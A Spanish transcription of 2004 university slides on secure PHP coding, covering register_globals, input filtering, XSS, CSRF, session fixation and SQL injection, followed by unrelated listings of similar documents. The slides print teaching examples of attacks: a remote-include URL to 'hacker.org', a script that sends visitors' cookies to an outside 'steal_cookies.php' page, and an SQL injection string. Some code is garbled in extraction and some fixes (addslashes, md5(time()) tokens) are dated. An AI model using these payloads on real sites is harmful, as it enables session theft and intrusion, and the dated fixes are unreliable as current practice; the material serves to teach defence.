Desarrollo de Código Seguro. Seguridad en PHP. Introducción. Register Globals
|
|
- Carla Tebar Páez
- hace 8 años
- Vistas:
Transcripción
1 Desarrollo de Código Seguro 22 y 27 de Septiembre de 2004 Facultad Regional Concepción del Uruguay Universidad Tecnológica Nacional Gabriel Arellano arellanog@frcu.utn.edu.ar Seguridad en PHP Lineamientos Generales. Filtrado de la Entrada. Utilización de Librerías. Diseño en Tres Capas. Alejandro de Brito Fontes debritoa@frcu.utn.edu.ar Introducción Register Globals PHP es un lenguaje que en casi todos los casos estará soportando aplicaciones accesibles vía Internet. Por esto se deben tener en cuenta aspectos de seguridad que normalmente se pasarían por alto en el caso de lenguajes de programación tradicionales. En principio: Considere los usos ilegítimos de su aplicación. Filtre la información proveniente del exterior. Investigue constantemente. La directiva register_globals permite que las variables pasadas por el cliente se registren como variables globales en nuestras aplicaciones. Esta directiva está desabilitada por defecto desde la versión de PHP. Esta directiva en sí no es una vulnerabilidad, pero representa un riesgo de seguridad. Por lo tanto debería diseñar sus aplicaciones para que funcionen sin register_globals activada.
2 Tomemos este ejemplo: Register Globals include "$path/common.php"; Si register_globals estuviera activada e hiciera una consulta como esta: script.php?path=http%3a%2f%2fhacker.org%2f%3f Mi script quedaría: Recomendaciones: Register Globals Inicializar todas la variables antes de utilizarlas. Establecer error_reporting a E_ALL durante el desarrollo. Siempre tomar los valores de los arreglos _POST y _GET. Evitar trabajar con register_globals activado. include " Filtrado de la Entrada Filtrado de la Entrada Como afirmamos varias veces, el filtrado de la información que el cliente envía es la pieza fundamental de la seguridad web. Esto involucra establecer mecanismos mediante los cuales se pueda determinar la validez de los datos que están siendo enviados. Un buen diseño debe ayudar a los desarrolladores a: Asegurar que el filtrado de datos no pueda evitarse. Asegurar que información inválida no pueda ser confundida con información válida. Identificar el origen de los datos. Para lograr los objetivos planteados anteriormente se pueden considerar dos enfoques: El enfoque dispatch (despachador). Un único script es el que está disponible vía web. Todo lo demás son módulos que se invocan a través de llamadas include o require. El enfoque include. Contamos con un único módulo encargado de las funciones de seguridad. Este módulo es incluído al principio de todos nuestros scripts que están disponibles vía web.
3 El enfoque dispatch Este método normalmente requiere que se pase una variable con la operación a realizar (En lugar de llamar a un script en particular). Por ejemplo: El script main.php es el único disponible vía web. Esto permite al desarrollador: Implementar medidas de seguridad en el script main.php y asegurarse que esas medidas no puedan ser evitadas. Fácilmente verificar que el filtrado de datos es llevado a cabo ya que todos los datos pasan por el script main.php. El enfoque dispatch /* Medidas de seguridad */ switch ($_GET['accion']){ case 'imprimir': include '/inc/presentation/form.inc'; case 'procesar': $form_valid = false; include '/inc/logic/process.inc'; if ($form_valid) { include '/inc/presentation/end.inc'; else { include '/inc/presentation/form.inc'; default: include '/inc/presentation/index.inc'; El enfoque include El enfoque include es el de tener unúnico módulo encargado de las funciones de seguridad. Este módulo es incluido al principio de todos los scripts. Por ejemplo: switch ($_POST['formulario']){ case 'login': $permitido = array(); $permitido[] = 'formulario'; $permitido[] = 'usuario'; $permitido[] = 'contrasenia'; $enviado = array_keys($_post); if ($permitido == $enviado){ include '/inc/logic/procesar.inc'; Filtrado de la Entrada En cuanto a los datos recibidos desde el cliente es importante tomar un enfoque de lo que no está explícitamente definido no se considera válido Por ejemplo, para recibir una dirección de correo: $validos = array(); $ _pattern='/^[^@\s]+@([-a-z0-9]+\.)+[a-z]{2,$/i'; if (preg_match($ _pattern, $_POST[' '])){ $validas[' '] = $_POST[' ']; Este enfoque es difícil y hasta imposible de implementar cuando no sabemos el tipo de dato que vamos a manejar.
4 Filtrado de la Entrada Filtrado de la Entrada También es recomendable implementar este enfoque cuando el número de opciones o valores aceptables son conocidos de antemano: Por ejemplo: $validos = array(); switch ($_POST['color']){ case 'rojo': case 'verde': case 'azul': $validos['color'] = $_POST['color']; Es recomendable también asegurarse que los datos enviados sean del mismo tipo que el de la variable que los recibirá: Por ejemplo: $validos = array(); if ($_POST['num1'] == strval(intval($_post['num1']))){ $validos['num1'] = $_POST['num1']; if ($_POST['num2'] == strval(floatval($_post['num2']))){ $validos['num2'] = $_POST['num2']; Cross Site Scripting Los ataques de XSS se basan en explotar la confianza que tienen los usuarios (o sus navegadores) en el sitio que visitan. Miremos este ejemplo de un libro de visitas muy simple: Cross Site Scripting Daría como resultado algo como esto: <form> <input type="text" name="mensaje"><br /> <input type="submit"> </form> if (isset($_get['mensaje'])){ $fp = fopen('./mensajes.txt', 'a'); fwrite($fp, "{$_GET['mensaje']<br />"); readfile('./mensajes.txt');
5 Cross Site Scripting Qué ocurriría si un visitante deja este mensaje? <script> document.location = ' + document.cookie </script> Cada vez que alguien visite la página todas sus cookies serían enviadas al script steal_cookies.php ubicado en un sitio distinto al nuestro... Para que este ataque sea efectivo hace falta que el navegador de la víctima tenga JavaScript activado. Cross Site Scripting Una versión más segura de nuestro libro de visitas: <form> <input type="text" name="mensaje"><br /> <input type="submit"> </form> if (isset($_get['mensaje'])){ $mensaje = htmlentities($_get['mensaje']); $fp = fopen('./mensajes.txt', 'a'); fwrite($fp, '$mensaje<br />'); readfile('./mensajes.txt'); A diferencia de XSS en este tipo de ataques se explota la confianza que un sitio le tiene a sus usuarios. En general se basan en la modificación de los pedidos que realizan usuarios válidos. Primero veamos cómo se hace un pedido HTTP: GET / HTTP/1.1 Host: example.org User-Agent: Mozilla/5.0 Gecko Accept: text/xml, image/png, image/jpeg, image/gif, */* Aquí pedimos la página principal de example.org La respuesta al pedido anterior sería por ejemplo: HTTP/ OK Content-Type: text/html Content-Length: 57 <html> <img src=" /> </html> Que generaría otro pedido: GET /image.png HTTP/1.1 Host: example.org User-Agent: Mozilla/5.0 Gecko Accept: text/xml, image/png, image/jpeg, image/gif, */* Mi servidor no tiene manera de distinguir este pedido de un pedido hecho a mano por un usuario malicioso.
6 Una versión más segura de nuestro libro de visitas: Para prevenir este tipo de ataques hay ciertas medidas que podemos tomar: Usar POST en lugar de GET. Usar _POST en lugar de confiarnos en register_globals. No pensar solamente en conveniencia. Forzar el uso de nuestros formularios. $token = md5(time()); $fp = fopen('./tokens.txt', 'a'); fwrite($fp, "$token\n"); <form method="post"> <input type="hidden" name="token" value=" echo $token; " /> <input type="text" name="message"><br /> <input type="submit"> </form> Una versión más segura de nuestro libro de visitas (Cont.) $tokens = file('./tokens.txt'); if (in_array($_post['token'], $tokens)){ if (isset($_post['mensaje'])){ $mensaje = htmlentities($_post['mensaje']); $fp = fopen('./mensajes.txt', 'a'); fwrite($fp, "$mensaje<br />"); readfile('./mensajes.txt'); En lugar del tiempo podemos emplear sesiones y uniqid() session_start(); if (isset($_post['message'])){ if ($_POST['token'] == $_SESSION['token']){ $message = htmlentities($_post['message']); $fp = fopen('./messages.txt', 'a'); fwrite($fp, "$message<br />"); $token = md5(uniqid(rand(), true)); $_SESSION['token'] = $token; Este script aún tiene alguna vulnerabilidades...
7 Manejo de Sesiones La seguridad de las sesiones es un tema complicado, por lo que no es de extrañarse que sean el objetivo de muchos ataques. La mayoría de los ataques a sesiones implican que el atacante intenta acceder a la sesión de otro usuario. La pieza crucial de información para un atacante es el identificador de sesión, ya que es lo único que necesita el atacante para lograr su objetivo. Existen básicamente tres métodos empleados para obtener las credenciales de otro usuario: Predicción. Captura. Fijación. Fijación de Sesiones Tomemos como ejemplo el siguiente script: session_start(); if (!isset($_session['visitas'])){ $_SESSION['visitas'] = 1; else{ $_SESSION['visitas']++; echo $_SESSION['visitas']; Qué ocurriría si yo hiciera un pedido como el siguiente? Fijación de Sesiones Una solución sería tratar de identificar la fuente de la sesión (el equipo del usuario que inicio la sesión). session_start(); if (isset($_session['http_user_agent'])){ if ($_SESSION['HTTP_USER_AGENT']!= md5($_server['http_user_agent'])){ /* Prompt for password */ exit; else { $_SESSION['HTTP_USER_AGENT'] = md5($_server['http_user_agent']); Acceso a Bases de Datos El usar bases de datos implica que nuestra aplicación deberá conectarse a las mismas y para ello deberá emplear las credenciales correspondientes. $host = 'example.org'; $username = 'myuser'; $password = 'mypass'; $db = mysql_connect($host, $username, $password); Este es el típico script de conexión que encontraremos en casi cualquier aplicación en php que emplee bases de datos. Este script es llamado por cualquier otro que desee conectarse a la base de datos. Debemos asegurarnos que sólo sea accesible a scripts autorizados.
8 SQL Injection El usar bases de datos implica que nuestra aplicación deberá conectarse a las mismas y para ello deberá emplear las credenciales correspondientes. $sql = "INSERT INTO users (reg_username, reg_password, reg_ ) VALUES ('{$_POST['reg_username']', '$reg_password', '{$_POST['reg_ ']')"; Este script recibe los datos de un formulario donde el usuario escribe su nombre, contraseña y dirección de . SQL Injection Supongamos que un usuario malicioso escribe en su nombre de usuario: bad_guy', 'mypass', ''), ('good_guy La consulta resultante sería: $sql = "INSERT INTO users (reg_username, reg_password, reg_ ) VALUES (' bad_guy', 'mypass', ''), ('good_guy','1234','shiflett@php.net')"; Con lo cual se crean dos usuarios. SQL Injection Lo podríamos solucionar con la función específica para mysql: $username = mysql_escape_string($_post['reg_username']); $sql = "INSERT INTO users (reg_username, reg_password, reg_ ) VALUES ('$username', '$reg_password', '{$_POST['reg_ ']')"; O bien con una solución más general: $username = addslashes($_post['reg_username']); Recursos Libros: Secure PHP Development Mohammed J. Kabir - Ed. Wiley Publishing. Recursos on-line: PHP Security Open Source Convention Open Web Application Security Project Cgisecurity
Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet
Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL
Más detallesDOCS. Pautas básicas para el DESARROLLO DE PLUGINS
Pautas básicas para el DESARROLLO DE PLUGINS ÍNDICE 1. Protección contra CSRF............................. 2. Protección XSS.................................... 3. Protección contra inyecciones SQL6...................
Más detallesSesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1
Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación
Más detallesCapítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable
Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)
Más detalles################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ##################
################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ################## [~] Indice [~] 0x01 - Introducción 0x02 - Qué es XSS? 0x03 - Casos en que se presenta XSS
Más detallesIntroducción a PHP. * No es necesario declarar previamente las variables.
Introducción a PHP La programación de sitios web cada día está más orientada al desarrollo de páginas dinámicas y aplicaciones, o sea sitios donde el usuario pueda interactuar con la web. Dentro de los
Más detallesDesarrollo de sitios web con PHP y MySQL
Desarrollo de sitios web con PHP y MySQL Tema 5: Sesiones José Mariano González Romano mariano@lsi.us.es Tema 5: Sesiones 1. Introducción 2. Manejo de sesiones 3. Autenticación de usuarios Introducción
Más detallesARE YOUR WEB VULNERABLE?
CROSS-SITE SITE SCRIPTING: ARE YOUR WEB APPLICATIONS VULNERABLE? Alberto Calle Alonso Sebastián Marcos Miguel Mateo de la Puente Madrid, Febrero 2009 1 ÍNDICE Introducción Cross-site scripting HTTP y HTML
Más detallesEste tipo de situaciones son solventadas a partir de las variables de sesión.
INDICE 1.- Concepto de Sesión 2.- Variables de Sesión 3.- Iniciando sesiones 4.- Creando variables de sesión 1.- Concepto de Sesión En los programas que hemos visto hasta ahora, hemos utilizado variables
Más detallesIntroducción a las Redes de Computadoras. Obligatorio 2 2011
Introducción a las Redes de Computadoras Obligatorio 2 2011 Facultad de Ingeniería Instituto de Computación Departamento de Arquitectura de Sistemas Nota previa - IMPORTANTE Se debe cumplir íntegramente
Más detalleshttp://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com
XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com Conceptos XSS: (Cross Site Scripting) tipo de vulnerabilidad surgida como consecuencia de errores de filtrado de las entradas del usuario en aplicaciones
Más detallesAtaques XSS en Aplicaciones Web
Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted
Más detallesRETO HACKER DE VERANO
RETO HACKER DE VERANO Blind XPath Reto Hacker de verano Índice 1 Introducción... 2 2 Proceso de trabajo... 2 2.1 Toma de contacto (fingerprinting)... 2 2.2 Comienza el ataque... 4 2.3 Explicacion del ataque
Más detallesINYECCIóN DE CóDIGO EN APLICACIONES PHP. Autor: Iñaki Rodriguez (2005) (mra@euskalnet.net)
INYECCIóN DE CóDIGO EN APLICACIONES PHP Autor: Iñaki Rodriguez (2005) (mra@euskalnet.net) 0 - Introducción Este sencillo artículo nos introduce un poco en el mundo de las auditorías de aplicaciones web.
Más detallesProgramación páginas web. Servidor (PHP)
Programación páginas web. Servidor (PHP) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos MySQL.
Más detallesCurso de Programación PHP
Curso de Programación PHP Presentación : PHP es el lenguaje de programación más usado en los servidores de Internet debido a su potencia, velocidad de ejecución y simplicidad que lo caracterizan. Este
Más detallesSECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP
SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web
Más detallesPROGRAMACIÓN PÁGINAS WEB CON PHP
PROGRAMACIÓN PÁGINAS WEB CON PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología
Más detallesIntroducción al desarrollo web (idesweb)
Introducción al desarrollo web (idesweb) Práctica 8: PHP 2 (cookies y sesiones) 1. Objetivos Conocer el concepto de cookie y sus posibles usos. Aprender a utilizar las cookies con PHP. Conocer el concepto
Más detallesMANUAL DE USUARIO APLICACIÓN SYSACTIVOS
MANUAL DE USUARIO APLICACIÓN SYSACTIVOS Autor Edwar Orlando Amaya Diaz Analista de Desarrollo y Soporte Produce Sistemas y Soluciones Integradas S.A.S Versión 1.0 Fecha de Publicación 19 Diciembre 2014
Más detallesCookies: qué son y para qué sirven
Cookies: qué son y para qué sirven Desde hace un tiempo las webs nos indican con mensajes que utilizan cookies propias de terceros. Muchos usuarios aceptan el mensaje sin más por el simple hecho de que
Más detallesQue es PHP? Que se puede hacer con PHP? Sintaxis del lenguaje. Variables. Operadores básicos. Condicionales. Ciclos.
Que es PHP? Que se puede hacer con PHP? Sintaxis del lenguaje. Variables. Operadores básicos. Condicionales. Ciclos. Qué es PHP? PHP (Hypertext Preprocessor). Es un lenguaje de programación: De código
Más detallesCurso de PHP con MySQL Gratis
Curso de PHP con MySQL Gratis Introducción Este mini curso o mini tutorial de PHP le ayudará a realizar cualquier sistema para que pueda insertar uno o varios registros a una base de datos con MySQL, este
Más detallesLa plantilla propone aprovechar esta estructura en común y sólo modificar el contenido del área del documento que sea diferente.
PLANTILLAS EN PHP El concepto de plantilla, es un criterio del desarrollo web que propone optimizar la cantidad de documentos HTML que se usan en el desarrollo de un sitio web. A lo largo de la navegación
Más detallesEscritorio remoto y VPN. Cómo conectarse desde Windows 7
Escritorio remoto y VPN. Cómo conectarse desde Windows 7 Hay ocasiones en las que es necesario conectarnos a un equipo informático situado a mucha distancia de donde nos encontramos para realizar sobre
Más detallesCONCLUSIONES 155 A través de cada uno de los capítulos del presente documento se han enumerado una serie herramientas de seguridad que forman parte del sistema de defensa de una red y que, controlan su
Más detallesCélula UABC-Live.net. Universidad Autónoma. de Baja California. http://uabc-live-net.spaces.live.com/ Facultad de Ciencias Químicas.
Célula Académica UABC-Live.net Universidad Autónoma de Baja California Facultad de Ciencias Químicas e Ingeniería http://uabc-live-net.spaces.live.com/ Sesión n No. 7 CardSpace Expositores: Blanca Patricia
Más detallesPOLÍTICA DE PRIVACIDAD DEL SITIO WEB DE KARDAMILI. Lineamientos generales
POLÍTICA DE PRIVACIDAD DEL SITIO WEB DE KARDAMILI Lineamientos generales Esta política de privacidad lo guiará en relación con nuestros lineamientos relacionados con el uso de su información personal,
Más detallesÍndice. 1. Introducción al XSS. 2. Taller Práctico Explotando la Vulnerabilidad. 3. Robo de cookies Uso de estas. 4. Arreglando la vulnerabilidad.
Índice 1. Introducción al XSS. Qué es el XSS? Por qué se produce? Tipos de XSS 2. Taller Práctico Explotando la Vulnerabilidad. XSS Reflejado XSS Persistente 3. Robo de cookies Uso de estas. Como robar
Más detallesUna solución a la medida de tus necesidades
Una solución a la medida de tus necesidades Qué es SISCOBER? Debido a la necesidad actual del mercado y dada la importancia de la tecnología para la gestión de cobranza, SECOBER S.A. DE C.V., pone a su
Más detallesObjetivo: Introducción conceptual y aplicación básica de los lenguajes del lado del servidor.
Sesión 03: Lenguajes web del servidor Competencias a Conseguir: - Conocer el entorno de trabajo a nivel de servidores web. - Instalación del localhost (Servidor Local). - Repaso general de PHP y ejercicios
Más detallesIntroducción a la Firma Electrónica en MIDAS
Introducción a la Firma Electrónica en MIDAS Firma Digital Introducción. El Módulo para la Integración de Documentos y Acceso a los Sistemas(MIDAS) emplea la firma digital como método de aseguramiento
Más detallesIntroducción a PostgreSQL con PHP
1 Introducción a PostgreSQL con PHP Recientemente he tenido que utilizar PostgreSQL para realizar algunos proyectos en donde laboro, principalmente por las características que ofrece PostgreSQL sobre MySQL,
Más detallesGuía de doble autenticación
Guía de doble autenticación Índice Guía doble autenticación 1. Introducción a la Doble Autenticación: Qué es? 4 Ataques a las contraseñas 6 Fuerza bruta 6 Malware 6 Phishing 6 Ataques a servidores 6 2.
Más detalles1.4.1.2. Resumen... 1.4.2. ÁREA DE FACTURACIÓN::INFORMES::Pedidos...27 1.4.2.1. Detalle... 1.4.2.2. Resumen... 1.4.3. ÁREA DE
MANUAL DE USUARIO DE ABANQ 1 Índice de contenido 1 ÁREA DE FACTURACIÓN......4 1.1 ÁREA DE FACTURACIÓN::PRINCIPAL...4 1.1.1. ÁREA DE FACTURACIÓN::PRINCIPAL::EMPRESA...4 1.1.1.1. ÁREA DE FACTURACIÓN::PRINCIPAL::EMPRESA::General...4
Más detallesabacformacio@abacformacio.com
Programación de páginas web con PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología
Más detallesManual de Usuario Módulo de Registro de Vehículos
Introducción. Este manual pretende ser una guía en el uso del Módulo de Registro de Vehículos (MRV). En su contenido podremos observar los aspectos más esenciales para poder utilizar de una manera muy
Más detallesCross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es antonio@noveria.es
Cross Site Scripting Conceptos Básicos y Casos prácticos Antonio González Castro www.noveria.es antonio@noveria.es # Definición Cross Site Scripting o también conocido como XSS por sus siglas en inglés,
Más detallesTécnicas de Programación
Técnicas de Programación U.D. 1.1.- Introducción al sistema operativo Windows 2000 profesional Tema 1.1.2.- Guía básica de Windows 2000 profesional Introducción Windows 2000 es un sistema multiusuario
Más detallesPropuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA
Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Documento de trabajo elaborado para la Red Temática DocenWeb: Red Temática de Docencia en Control mediante Web (DPI2002-11505-E)
Más detallesDesarrollo de sitios web con PHP y MySQL
Desarrollo de sitios web con PHP y MySQL Tema 3: Formularios José Mariano González Romano mariano@lsi.us.es Tema 3: Formularios 1. Acceso a formularios HTML desde PHP 2. El formulario de PHP 3. Subida
Más detallesSesión No. 10. Contextualización: Nombre de la sesión: ClickBalance segunda parte PAQUETERÍA CONTABLE
Paquetería contable 1 Sesión No. 10 Nombre de la sesión: ClickBalance segunda parte Contextualización: Como complemento de este sistema a las demás áreas operativas de una empresa como son recursos humanos,
Más detallesPreguntas y respuestas sobre el cifrado de la información personal. La guía para aprender a cifrar tu información
Guía de Cifrado Preguntas y respuestas sobre el cifrado de la información personal La guía para aprender a cifrar tu información 2 Qué es lo que estamos cuidando? A través del cifrado cuidamos de fotos,
Más detallesEvalSys - Manual Completo en formato PDF Características Generales
EvalSys - Manual Completo en formato PDF Características Generales EvalSys es un sistema diseñado para el ingreso en línea, de resúmenes y/o trabajos completos, en reuniones o congresos virtuales o presenciales.
Más detallesPHP: Interacción con HTML
Francisco J. Martín Mateos Carmen Graciani Diaz Dpto. Ciencias de la Computación e Inteligencia Artificial Universidad de Sevilla Variables En algunas ocasiones es necesario saber si una variable tiene
Más detallesHost. En este texto, entenderemos por host toda máquina - léase computadora. Cuenta. Una cuenta, en general, es un espacio de memoria y de disco que
CONCEPTOS BASICOS. Usuario. Un usuario es toda persona que utilice una computadora. Host. En este texto, entenderemos por host toda máquina - léase computadora - conectada a InterNet. También se les llaman
Más detallesTema: GESTIÓN DE SESIONES EN PHP.
2 PHP Tema: GESTIÓN DE SESIONES EN PHP. Facultad: Ingeniería Escuela: Ingeniería en Computación Asignatura: PHP PHP. Guía 6 3 Contenido. En esta práctica se aborda el tema de sesiones. Se da a conocer
Más detallesCapítulo 2.- Vulnerabilidades en aplicaciones web.
Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como
Más detallesEscribiendo el HTML. Un formulario se declara entre estos dos tags:
Formularios Un formulario HTML sirve como principal punto de interacción con el usuario: mediante ellas, podemos hacer posible la interacción de nuestra página Web para con el usuario que visita nuestro
Más detallesFuncionamiento del sistema de autentificación en PHP
Sistema de autentificación PHP Cómo realizar un sistema de autentificación en PHP, en el que los usuarios deban introducir nombre y contraseña para que puedan visualizar las páginas de una aplicación con
Más detallesMANUAL DE USUARIO - SECURE CLIENT - INTERNACIONAL
TABLA DE CONTENIDO Página 1 de 15 1 OBJETIVO... 2 2 ALCANCE... 2 3 Introducción... 2 4 Cuando utilizar cada función - Requerimientos... 3 5 Instalación SecureClient... 3 6 Crear un sitio... 4 7 Cambiar
Más detallesManual para la utilización de PrestaShop
Manual para la utilización de PrestaShop En este manual mostraremos de forma sencilla y práctica la utilización del Gestor de su Tienda Online mediante Prestashop 1.6, explicaremos todo lo necesario para
Más detallesMANUAL DE PRACTICUM12 PARA UNIVERSIDADES ÁMBITO MÁSTER
MANUAL DE PRACTICUM12 PARA UNIVERSIDADES ÁMBITO MÁSTER Gestión de plazas de prácticas de los alumnos del Máster en Profesorado de ESO y Bachillerato, FP y Enseñanza de Idiomas Manual para la gestión de
Más detalles3. Qué necesitamos para usar Wordpress?
Contenido 1. Objetivos de este tutorial... 2 2. Qué es Wordpress?... 2 3. Qué necesitamos para usar Wordpress?... 2 3.1 Alojamiento web... 3 3.2 DOMINIO O DIRECCIÓN DE INTERNET... 3 3.3 Cuenta FTP... 4
Más detallesInstalar protocolo, cliente o servicio nuevo. Seleccionar ubicación de red. Práctica - Compartir y conectar una carpeta
Configuración de una red con Windows Aunque existen múltiples sistemas operativos, el más utilizado en todo el mundo sigue siendo Windows de Microsoft. Por este motivo, vamos a aprender los pasos para
Más detallesSistema de Gestión Portuaria Sistema de Gestión Portuaria Uso General del Sistema
Sistema de Gestión Portuaria Uso General del Sistema Uso General del Sistema Página 1 de 21 Contenido Contenido... 2 1.Ingreso al Sistema... 3 2.Uso del Menú... 6 3.Visualizar Novedades del Sistema...
Más detallesGracias a ese IP único que tiene cada ordenador conectado a la red de internet se pueden identificar y comunicar los ordenadores.
COMO FUNCIONA INTERNET Internet es una gran red de ordenadores a nivel mundial, que pueden intercambiar información entre ellos. Se pueden comunicar porque están unidos a través de conexiones telefónicas,
Más detallesConstrucción de una aplicación web para crear un sistema de encuestas con la tecnología PHP y la base de datos MySQL.
Sistema de encuestas PHP y MySQL Construcción de una aplicación web para crear un sistema de encuestas con la tecnología PHP y la base de datos MySQL. Sistema de encuestas. Base de datos a utilizar Algunas
Más detallesMANUAL DE USUARIO DE CUENTAS DE CORREO
MANUAL DE USUARIO DE CUENTAS DE CORREO Existen dos formas de consultar el correo, por Interfaz Web (Webmail), la cual se realiza desde un navegador de Internet, o mediante un cliente de Correo, tal como
Más detallesManual de Acceso Remoto al Portal Timbó. Montevideo 2011
Manual de Acceso Remoto al Portal Timbó Montevideo 2011 Objetivo El propósito de la implementación de este sistema es permitir a los usuarios miembros del Sistema Nacional de Investigadores, el acceso
Más detallesHostaliawhitepapers. Usar Plesk para, poner en marcha nuestro dominio.
Usar Plesk para, poner en marcha nuestro dominio. Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Dominio y alojamiento web Registrar un dominio no es sinónimo de tener
Más detallesCómo parametrizar el Puesto de Trabajo asociado a una base de datos de IVA
Pág 1 de 5 Importante: Estos pasos deben seguirse si usted ya cuenta con puestos de trabajo definidos. En ese caso asumimos además que usted ya ha realizado la asociación del puesto de trabajo con una
Más detallesGuía de uso del Sistema de Gestión de Incidencias (RT) del Servicio de Informática
Guía de uso del Sistema de Gestión de Incidencias (RT) del Servicio de Informática Ayuntamiento de Colmenar Viejo Informática Fecha última actualización: 10/08/2011 Acceso al sistema Para acceder al sistema
Más detallesQué son y cómo combatirlas
Redes zombies Qué son y cómo combatirlas Calle San Rafael, 14 28108 Alcobendas (Madrid) 902 90 10 20 www..com Introducción Hoy en día podemos encontrar un elevado número de amenazas en la red, pero unas
Más detallesServidor web E-Sniper
Servidor web E-Sniper Tabla de contenido Instalación del servidor IIS... 1 Instalación de la aplicación... 3 Crear el Website... 4 Comprobar la aplicación... 5 Configurar la base de datos... 6 SQLServer...
Más detallesTutorial de Unity 3D Tema 52 Bases de Datos. Tutorial de Unity 3D. Bases de Datos
Tutorial de Unity 3D En este tutorial trabajaremos el almacenamiento de información en una base de datos, bien sea local o remota. Dicha información puede ser propia el cliente (Créditos de juego, puntos
Más detallesBotón de Pago Instapago versión 1.1 TECNOLOGÍA INSTAPAGO C.A. www.instapago.com
Botón de Pago Instapago versión 1.1 TECNOLOGÍA INSTAPAGO C.A. www.instapago.com Histórico de Cambios Fecha Ver. Autor Descripción 06/06/2014 1.0 Enyert Viñas Creación del Documento 06/10/2014 1.1 Alex
Más detallesConfigurar protección infantil en Windows XP
Configurar protección infantil en Windows XP Web de la asociación española de pediatría En la web de la asociación española de pediatría podemos encontrar un link al site que han montado junto a Microsoft
Más detalles15 CORREO WEB CORREO WEB
CORREO WEB Anteriormente Hemos visto cómo funciona el correo electrónico, y cómo necesitábamos tener un programa cliente (Outlook Express) para gestionar los mensajes de correo electrónico. Sin embargo,
Más detallesBase de datos en Excel
Base de datos en Excel Una base datos es un conjunto de información que ha sido organizado bajo un mismo contexto y se encuentra almacenada y lista para ser utilizada en cualquier momento. Las bases de
Más detallesFormas de llevar a cabo un backup de una base de datos MySQL
Formas de llevar a cabo un backup de una base de datos MySQL Calle San Rafael, 14 28108 Alcobendas (Madrid) 902 90 10 20 www..com Introducción Muchas aplicaciones web hacen uso de bases de datos donde
Más detallesSQL INJECTION. Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián. 66.69 Criptografía y Seguridad Informática.
SQL INJECTION Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián Grupo 5 66.69 Criptografía y Seguridad Informática Introducción 2 Ataque basado en inyección de código Explota omisiones
Más detallesCheckOUT HELP DESK. Una vez en sesión, UD. Podrá registrar problemas, consultas y hacer un seguimiento de los problemas que UD. ha ingresado.
CheckOUT HELP DESK CHECKOUT IT implementará un cambio en el modo de atención en el servicio de Soporte Técnico. De ahora en más, UD. podrá registrar los problemas, consultas, etc. que esté teniendo con
Más detallesDOCUMENTOS COMPARTIDOS CON GOOGLE DOCS
DOCUMENTOS COMPARTIDOS CON GOOGLE DOCS 1. Introducción Los ambientes de aprendizaje acompañados de trabajos colaborativos como estrategia se revierten en actividades de diferente índole (análisis de videos,
Más detalles1.1 Conceptos Importantes
2 1. Índice 1.1 Conceptos Importantes 2. Ejemplo Implementación- Preparación 2.1 Guardar ce_cid y preparar para envío 2.2 Preparar URL S2S y llamar al servidor de Matomy 3. Información Adicional 3 4 5
Más detallesManual de Usuario SafeDigital V2 Emisión Certificados
Manual de Usuario SafeDigital V2 Emisión Certificados Noviembre de 2014 Indice 1 INTRODUCCIÓN... 3 2 DESCRIPCIÓN GENERAL DEL SISTEMA... 4 2.1 Sistema de Emisión de Certificados de Seguros... 4 3 COMO ACCEDER
Más detallesManual de Panel de Control de Hosting Compartido
Manual de Panel de Control de Hosting Compartido Manual Hosting Compartido 1 Índice 1 INTRODUCCIÓN 3 2 SERVICIOS DISPONIBLES 5 2.1 Gestión de FTP 5 2.1.1 Cuentas FTP 5 2.1.2 Crear cuenta FTP 5 2.2 Estadísticas
Más detallesManual de NetBeans y XAMPP
Three Headed Monkey Manual de NetBeans y XAMPP Versión 1.0 Guillermo Montoro Delgado Raúl Nadal Burgos Juan María Ruiz Tinas Lunes, 22 de marzo de 2010 Contenido NetBeans... 2 Qué es NetBeans?... 2 Instalación
Más detallesProceso de cifrado. La fortaleza de los algoritmos es que son públicos, es decir, se conocen todas las transformaciones que se aplican al documento
